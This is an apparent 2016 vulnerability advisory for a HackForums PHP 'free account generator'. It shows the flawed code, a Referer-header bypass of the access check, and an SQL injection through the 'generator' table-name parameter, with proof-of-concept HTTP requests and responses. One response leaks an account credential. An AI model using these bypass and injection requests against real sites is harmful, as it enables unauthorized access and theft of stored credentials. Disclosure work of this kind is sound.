==============================================================================================
[-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities
 
[-] Author => bRpsd (skype: vegnox)
 
[-] Date Release => 22 August, 2016
 
[-] Vendor => HackForums, froy0z
    Title => Free Account Generator 2.0
    Thread Post => http://hackforums.net/showthread.php?tid=4882268
    Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA
    Vulnerable Version => 2.0
    Tested Version => Latest, 2.0 on a Wamp Server
	==============================================================================================
	
	
	
	
	
	

	Vulnerability #1 : Using the generator without even registration or purchasing a membership.
	Vuln File: /lib/generate.php
	Vuln Code: Line 3-6
	
/*********************************************************************************
3.	$pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST'));
4.  if($pos===false){
5.    die('No Access');
6.  }
*********************************************************************************/

strpos checks if the HTTP_REFERER matches with HTTP_HOST before generating data
which make it possible for anyone to use the generator by simply changing the referer. 


[-] Proof Of Concept [-]



http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1


Response:
No Access






[bypass]

http://localhost/lib/generate.php?generator=1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1
Connection: keep-alive
If-None-Match: 1
Upgrade-Insecure-Requests: 1


Response:
[email protected]:123123






--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
	Vulnerability #2 : SQL Injection
	Vuln File: /lib/generate.php
	Vuln Code: Line 10 & 34-40
	
/******************************************************************************************************************************************************************
10. $generator = mysqli_real_escape_string($con, $_GET['generator']);

34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con));
35. if(mysqli_num_rows($result) < 1){
36. 	exit("0 Accounts in stock");
37. }
38. while($row = mysqli_fetch_array($result)){
39. 	echo $row['alt'];
40. }
******************************************************************************************************************************************************************/


The mysqli_query use the parameter 'generator' in the SQL query, which makes it possible to interfer and send malicious commands to the DBMS.







[-] Proof Of Concept [-]


http://localhost/lib/generate.php?generator=1+3
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1+3
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1



Response:
Table 'FAG_2sql1.generator1 3' doesn't exist




http://localhost/lib/generate.php?generator=1`+TEST
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lib/generate.php?generator=1`+TEST
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: 1

Response:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1

# siph0n [2016-08-22]